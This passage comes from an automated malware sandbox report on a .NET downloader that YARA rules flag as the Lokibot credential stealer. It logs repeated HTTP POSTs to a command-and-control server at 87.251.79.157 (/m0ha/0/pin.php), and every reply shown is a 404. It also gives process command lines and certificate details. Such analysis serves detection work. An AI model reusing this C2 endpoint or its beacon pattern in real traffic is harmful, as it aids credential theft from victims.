                                              Mar 15, 2021 20:01:55.280209064 CET  1236                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:54 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              7           192.168.2.5  49702        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:07.329027891 CET  1140                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:08.041173935 CET  1141                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:07 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              70          192.168.2.5  49766        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:55.525891066 CET  1237                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:55.944955111 CET  1237                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:55 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              71          192.168.2.5  49767        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:56.202303886 CET  1238                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:57.125554085 CET  1239                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:56 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              72          192.168.2.5  49768        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:57.369297028 CET  1239                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:58.576225042 CET  1240                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:57 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              73          192.168.2.5  49769        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:58.816874027 CET  1241                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:02:01.043610096 CET  1241                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:58 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              74          192.168.2.5  49770        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:02:01.283552885 CET  1242                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:02:02.824486971 CET  1243                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:02:01 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              75          192.168.2.5  49771        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:02:03.077739954 CET  1243                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              76          192.168.2.5  49772        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              77          192.168.2.5  49773        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              78          192.168.2.5  49774        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              79          192.168.2.5  49775        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              8           192.168.2.5  49703        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:08.319139957 CET  1142                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:09.199748039 CET  1142                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:08 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              80          192.168.2.5  49776        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              81          192.168.2.5  49777        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              82          192.168.2.5  49778        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              83          192.168.2.5  49779        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              84          192.168.2.5  49780        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              85          192.168.2.5  49781        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              86          192.168.2.5  49782        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              87          192.168.2.5  49783        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              88          192.168.2.5  49784        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              89          192.168.2.5  49785        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              9           192.168.2.5  49704        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:09.459260941 CET  1143                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:09.990871906 CET  1144                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:09 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              90          192.168.2.5  49786        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              91          192.168.2.5  49787        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              92          192.168.2.5  49788        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              93          192.168.2.5  49789        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              94          192.168.2.5  49790        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              95          192.168.2.5  49791        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              96          192.168.2.5  49792        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              97          192.168.2.5  49793        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              98          192.168.2.5  49794        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              99          192.168.2.5  49795        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe


                                              HTTPS Packets

Timestamp: Mar 15, 2021 20:00:49.109810114 CET
Source IP: 172.67.197.219
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49692
JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad
Certificate 1:
  Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US
  Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
  Not Before: Fri Mar 12 01:00:00 CET 2021
  Not After: Sat Mar 12 00:59:59 CET 2022
Certificate 2:
  Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
  Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
  Not Before: Mon Jan 27 13:48:08 CET 2020
  Not After: Wed Jan 01 00:59:59 CET 2025

                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:20:00:46
                                              Start date:15/03/2021
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe'
                                              Imagebase:0xa60000
                                              File size:433664 bytes
                                              MD5 hash:968E090B17CE57156A66188B4DB032BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:20:00:51
                                              Start date:15/03/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                              Imagebase:0x12e0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:00:52
                                              Start date:15/03/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:00:52
                                              Start date:15/03/2021
                                              Path:C:\Windows\SysWOW64\timeout.exe
                                              Wow64 process (32bit):true
                                              Commandline:timeout 1
                                              Imagebase:0x3d0000
                                              File size:26112 bytes
                                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:00:55
                                              Start date:15/03/2021
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Imagebase:0x630000
                                              File size:433664 bytes
                                              MD5 hash:968E090B17CE57156A66188B4DB032BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:20:00:58
                                              Start date:15/03/2021
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120
                                              Imagebase:0x7ff797770000
                                              File size:434592 bytes
                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Disassembly

                                              Code Analysis
